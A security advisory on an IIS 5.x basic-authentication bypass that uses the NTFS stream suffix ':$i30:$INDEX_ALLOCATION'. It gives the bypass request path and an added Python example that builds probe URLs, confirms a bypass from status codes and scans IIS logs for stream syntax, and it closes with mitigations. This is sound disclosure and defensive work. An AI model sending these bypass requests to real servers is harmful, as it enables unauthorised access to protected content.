Security Advisory
Microsoft Internet Information Services Basic Authentication Security Bypass
Reported Date: 05-07-10
Rated Level: Critical
Impact: Security bypass, Remotely exploitable
Affected Software: Microsoft Internet Information Services (IIS) 5.x
Description: Soroush Dalili has discovered a vulnerability in Microsoft Internet Information Services (IIS) that can be exploited by malicious people to bypass certain security restrictions.

The vulnerability is caused by an error in the handling of basic authentication for directories. IIS matches the authentication restriction against the directory name as written in the request, while the NTFS file system resolves a name carrying the directory's own index stream to the same directory. This can be exploited to bypass authentication and access e.g. protected directories by appending the NTFS stream name and stream type (":$i30:$INDEX_ALLOCATION") to the directory name within a request, i.e. requesting "/protected:$i30:$INDEX_ALLOCATION/secret.asp" instead of "/protected/secret.asp".

The vulnerability is confirmed in version 5.1 on a fully-patched Windows XP SP3. Other versions may also be affected.
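The following is an added example, not code from the advisory or from the discoverer: it builds the bypass request path described above, gives the check a tester would apply to the two responses, and flags the same stream syntax in IIS W3C log lines so the attempt can be detected. Host names, paths and log lines are constructed; the detection regex generalises beyond the exact suffix on this page to any NTFS stream syntax inside a path segment (an assumption, not something the advisory states).

```python
"""Added example (not from the advisory): probe URL, response check and
log detection for the IIS basic-authentication bypass described above.
Host names, paths and log lines are constructed for illustration."""
import re
from urllib.parse import unquote, urlsplit, urlunsplit

# Suffix from the advisory: NTFS stream name "$i30", stream type "$INDEX_ALLOCATION".
STREAM_SUFFIX = ":$i30:$INDEX_ALLOCATION"

# Generic NTFS stream syntax inside one path segment: "name:stream:$TYPE".
# Assumption: flag any such syntax, not only the exact suffix above.
_STREAM_RE = re.compile(r":[^/:]*:\$[A-Za-z_]+", re.IGNORECASE)


def bypass_url(url, protected_dir):
    """Append the stream suffix to the protected directory segment of url."""
    parts = urlsplit(url)
    segments = [s + STREAM_SUFFIX if s == protected_dir else s
                for s in parts.path.split("/")]
    return urlunsplit(parts._replace(path="/".join(segments)))


def normalize_path(path):
    """Strip NTFS stream syntax from every segment, giving the real target.
    Percent-decodes first so '%3A' cannot hide the colon from the check."""
    segments = [_STREAM_RE.sub("", s) for s in unquote(path).split("/")]
    return "/".join(segments)


def is_bypass(status_without_suffix, status_with_suffix):
    """True when the plain request was challenged (401) but the stream
    variant was served (2xx): the authentication restriction was bypassed."""
    return status_without_suffix == 401 and 200 <= status_with_suffix < 300


def flag_log_lines(lines):
    """Scan IIS W3C extended log lines; return (c-ip, cs-uri-stem, sc-status)
    for every request whose URI stem carries NTFS stream syntax."""
    fields, hits = [], []
    for line in lines:
        if line.startswith("#Fields:"):
            fields = line.split()[1:]  # column names for the records that follow
            continue
        if line.startswith("#") or not line.strip():
            continue
        rec = dict(zip(fields, line.split()))
        stem = rec.get("cs-uri-stem", "")
        if _STREAM_RE.search(unquote(stem)):
            hits.append((rec.get("c-ip"), stem, rec.get("sc-status")))
    return hits


# Constructed log sample: the challenged request, then the bypass request.
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 5.1
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2010-07-05 10:00:01 10.0.0.5 GET /protected/secret.asp - 401
2010-07-05 10:00:02 10.0.0.5 GET /protected:$i30:$INDEX_ALLOCATION/secret.asp - 200
2010-07-05 10:00:03 10.0.0.9 GET /public/index.htm - 200
""".splitlines()

if __name__ == "__main__":
    print(bypass_url("http://victim.example/protected/secret.asp", "protected"))
    for hit in flag_log_lines(SAMPLE_LOG):
        print("suspicious request:", hit, "->", normalize_path(hit[1]))
```

When testing a server, issue the plain request and the `bypass_url` variant with the same credentials omitted and feed the two status codes to `is_bypass`; a 401 followed by a 200 confirms the issue. On the defensive side, `normalize_path` shows the directory a request really targets once the stream suffix is removed, which is what an access check has to evaluate.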


Note: Discovered by Soroush Dalili.
Solution: Do not rely on the IIS basic authentication setting alone to restrict access to resources. Protect sensitive directories with NTFS permissions (file-system ACLs) as well, since those are enforced on the directory itself regardless of how its name is written in the request, and consider rejecting request paths containing ":" or "$" with a request filter, as NTFS file and directory names cannot contain these characters.
Feedback: If you have additional information or corrections for this security advisory please contact us at advisory(at)triviasecurity.org